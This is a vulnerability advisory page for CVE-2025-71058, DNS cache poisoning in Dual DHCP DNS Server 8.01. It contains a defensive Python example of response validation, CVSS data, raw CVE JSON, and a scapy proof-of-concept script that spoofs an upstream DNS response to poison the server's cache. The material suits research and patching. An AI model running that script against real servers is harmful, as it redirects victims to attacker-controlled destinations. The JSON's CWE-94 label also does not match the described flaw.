Security Vulnerability Report
CVE-2025-71058 CVSS 9.1 CRITICAL

CVE-2025-71058

Published: 2026-04-07 19:16:43
Last Modified: 2026-04-21 20:16:26

Description

Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS responses without validating that the response originates from a legitimate configured upstream DNS server. The implementation matches responses primarily by TXID and inserts results into the cache, enabling a remote attacker to inject forged responses and poison the DNS cache, potentially redirecting victims to attacker-controlled destinations.
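
The acceptance check the description says is missing, shown beside the TXID-only pattern, as an added example (not code from Dual DHCP DNS Server or from the advisory). The `Pending` record, the function names and the sample addresses are assumptions made for illustration.

```python
import struct
from typing import NamedTuple

class Pending(NamedTuple):      # hypothetical record kept per forwarded query
    qname: str
    qtype: int
    upstream: tuple             # (ip, port) the query was actually sent to

def parse_question(msg: bytes):
    """Return (txid, is_response, qname, qtype) for a one-question DNS message."""
    if len(msg) < 12:
        raise ValueError("short header")
    txid, flags, qdcount = struct.unpack("!HHH", msg[:6])
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    labels, pos = [], 12
    while pos < len(msg) and msg[pos] != 0:
        n = msg[pos]
        if n > 63 or pos + 1 + n > len(msg):   # pointers are not valid in a question
            raise ValueError("bad label")
        labels.append(msg[pos + 1:pos + 1 + n].decode("ascii").lower())
        pos += 1 + n
    if pos + 5 > len(msg):                     # root label + QTYPE + QCLASS must remain
        raise ValueError("truncated question")
    qtype = struct.unpack("!H", msg[pos + 1:pos + 3])[0]
    return txid, bool(flags & 0x8000), ".".join(labels), qtype

def accept_txid_only(msg, src, pending):
    """Flawed pattern from the description: any sender with a live TXID is cached."""
    txid, is_resp, _, _ = parse_question(msg)
    return is_resp and txid in pending

def accept_validated(msg, src, pending):
    """Require sender == queried upstream and an echoed question that matches."""
    try:
        txid, is_resp, qname, qtype = parse_question(msg)
    except ValueError:
        return False
    p = pending.get(txid)
    return bool(p and is_resp and src == p.upstream
                and (qname, qtype) == (p.qname.lower(), p.qtype))

def sample_response(txid, qname, qtype=1):
    """Constructed sample: header with QR=1 plus the question section only."""
    name = b"".join(bytes([len(l)]) + l.encode() for l in qname.split(".")) + b"\0"
    return struct.pack("!HHHHHH", txid, 0x8180, 1, 0, 0, 0) + name + struct.pack("!HH", qtype, 1)
```

A source check does not stop a sender who spoofs the upstream address, so the TXID and the outbound source port also need to be unpredictable for each forwarded query.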

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Dual DHCP DNS Server 8.01

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2025-71058: DNS Cache Poisoning
# This script sends a forged DNS response to poison the cache.
from scapy.all import *
import random


def send_poisoned_response(target_ip, target_port, txid, domain_to_poison, malicious_ip):
    # Construct IP layer with spoofed source (upstream DNS IP)
    # Note: In real attacks, source IP is spoofed to match legitimate upstream DNS.
    # If the target does not validate source, spoofing might not be strictly required,
    # but standard DNS poisoning implies spoofing.
    ip = IP(src="192.168.1.1", dst=target_ip)  # Replace with actual upstream IP if needed

    # Construct UDP layer
    udp = UDP(sport=53, dport=target_port)

    # Construct DNS layer
    # id=txid is crucial for the server to accept the response
    # qr=1 indicates a response
    dns = DNS(
        id=txid,
        qr=1,
        qd=DNSQR(qname=domain_to_poison),
        an=DNSRR(rrname=domain_to_poison, type="A", ttl=300, rdata=malicious_ip)
    )

    # Send the packet
    packet = ip / udp / dns
    send(packet)
    print(f"[*] Poisoned response sent for {domain_to_poison} -> {malicious_ip}")


if __name__ == "__main__":
    # Configuration
    TARGET_DNS = "192.168.1.100"  # IP of the vulnerable Dual DHCP DNS Server
    DOMAIN = "example.com"
    MALICIOUS_IP = "6.6.6.6"
    # TXID needs to be guessed or sniffed. Assuming we have it.
    TXID = random.randint(0, 65535)
    send_poisoned_response(TARGET_DNS, 53, TXID, DOMAIN, MALICIOUS_IP)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71058", "sourceIdentifier": "[email protected]", "published": "2026-04-07T19:16:43.220", "lastModified": "2026-04-21T20:16:26.490", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dual DHCP DNS Server 8.01 improperly accepts and caches UDP DNS responses without validating that the response originates from a legitimate configured upstream DNS server. The implementation matches responses primarily by TXID and inserts results into the cache, enabling a remote attacker to inject forged responses and poison the DNS cache, potentially redirecting victims to attacker-controlled destinations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/FPokerFace/Security-Advisory/blob/main/CVE-2025-71058/poc.c", "source": "[email protected]"}, {"url": "https://github.com/FPokerFace/Security-Advisory/tree/main/CVE-2025-71058", "source": "[email protected]"}, {"url": "https://sourceforge.net/projects/dhcp-dns-server/", "source": "[email protected]"}]}}